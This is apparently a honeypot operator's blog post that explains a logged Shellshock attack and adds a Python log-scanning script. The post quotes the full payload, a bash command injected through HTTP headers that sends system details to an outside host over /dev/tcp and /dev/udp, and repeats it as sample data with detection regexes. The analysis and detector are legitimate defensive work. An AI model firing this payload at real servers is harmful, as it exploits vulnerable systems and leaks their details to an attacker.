Thursday, 18 June 2015

Shell injection attack: /dev/tcp/74.208.79.34/21 -- bash echo

My honeypot was attacked by:
Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" 213.165.70.245 DE SHELLinjection
So, what is happening here:
  1. I had to ask the experts what "> /dev/tcp/74.208.79.34/21" can do. The answer is quite simple: bash treats /dev/tcp/HOST/PORT (and /dev/udp/HOST/PORT) as a special pseudo-file. Redirecting output to it makes bash open a TCP (or UDP) connection to that host and port and send the redirected data there. No such file exists on disk; the redirection is implemented inside bash itself, which is also why the payload calls /bin/bash -c explicitly instead of relying on /bin/sh.
  2. The "() { :;};" prefix in the User-Agent and Referer headers is the Shellshock pattern: a vulnerable bash executes the commands that follow the function definition when the CGI handler passes the header into its environment. The attacker used this to report the vulnerability of my server to the IP address contained in the attack: the echoed string "109.234.106.8/cgi-bin/bash" (presumably the honeypot's own address plus the probed URL) tells the collector which host responded, and the output of "uname -a" adds kernel and architecture details.
  3. He sent the report via both TCP and UDP, to port 21 (normally FTP) in each case, most likely so that at least one of the two gets through an egress filter.
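To make the analysis above repeatable, here is an added example (my own code, not part of the original post or of beeswarm) that scans Apache-style access-log lines for the Shellshock trigger, pulls out the commands handed to "bash -c", and lists every /dev/tcp and /dev/udp callback target they contain. The sample log is constructed from the honeypot line quoted above plus one benign request for contrast; the regular expressions, the Callback type and the analyse() function are my own assumptions about how to structure such a check.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the honeypot request from the post (payload appears in
# both the Referer and the User-Agent field, quotes escaped as \" as Apache writes them)
# and a harmless request that must not be flagged.
PAYLOAD = (
    '() { :;}; /bin/bash -c \\"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; '
    '/bin/uname -a > /dev/tcp/74.208.79.34/21; '
    'echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\\"'
)
SAMPLE_LOG = [
    f'213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 '
    f'"{PAYLOAD}" "{PAYLOAD}"',
    '10.0.0.5 - - [18/Jun/2015:06:00:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.38.0"',
]

# Shellshock trigger: an exported function body "() { :;}" followed by trailing commands.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;?\s*\}\s*;')
# bash network redirection targets: /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT.
NETDEV_RE = re.compile(r'/dev/(tcp|udp)/([0-9A-Za-z.\-]+)/(\d{1,5})')
# The command string given to "sh -c" / "bash -c"; the surrounding quotes may be \"-escaped.
BASH_C_RE = re.compile(r'(?:ba)?sh\s+-c\s+\\?"(.*?)\\?"')
SRC_IP_RE = re.compile(r'^(\S+) ')


@dataclass(frozen=True)
class Callback:
    proto: str   # "tcp" or "udp"
    host: str
    port: int


def _dedupe(items):
    """Keep first occurrence of each item, preserving order."""
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def is_shellshock(line: str) -> bool:
    return SHELLSHOCK_RE.search(line) is not None


def extract_callbacks(line: str) -> list:
    """All distinct /dev/tcp and /dev/udp destinations referenced in the line."""
    return _dedupe(Callback(proto, host, int(port))
                   for proto, host, port in NETDEV_RE.findall(line))


def extract_commands(line: str) -> list:
    """Individual commands inside every 'bash -c "..."' body, ';'-split, whitespace-normalised."""
    cmds = []
    for body in BASH_C_RE.findall(line):
        cmds.extend(' '.join(c.split()) for c in body.split(';') if c.strip())
    return _dedupe(cmds)


def analyse(lines):
    """Return one finding per Shellshock attempt: source IP, commands and callback targets."""
    findings = []
    for line in lines:
        if not is_shellshock(line):
            continue
        m = SRC_IP_RE.match(line)
        findings.append({
            'src': m.group(1) if m else None,
            'commands': extract_commands(line),
            'callbacks': extract_callbacks(line),
        })
    return findings


if __name__ == '__main__':
    for finding in analyse(SAMPLE_LOG):
        print('Shellshock attempt from', finding['src'])
        for cmd in finding['commands']:
            print('  cmd:', cmd)
        for cb in finding['callbacks']:
            print(f'  callback: {cb.proto} {cb.host}:{cb.port}')
```

The callback list is the useful output for a defender: each host:port pair is a candidate for an egress block rule or a firewall log search, and a hit on the same destination from the honeypot's own outbound logs would confirm that bash actually executed the payload rather than merely logging it.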
The source of the attack was 213.165.70.245, a server hosted by "1&1 Internet Inc."

The reporting destination was 74.208.79.34, a server hosted by the same company.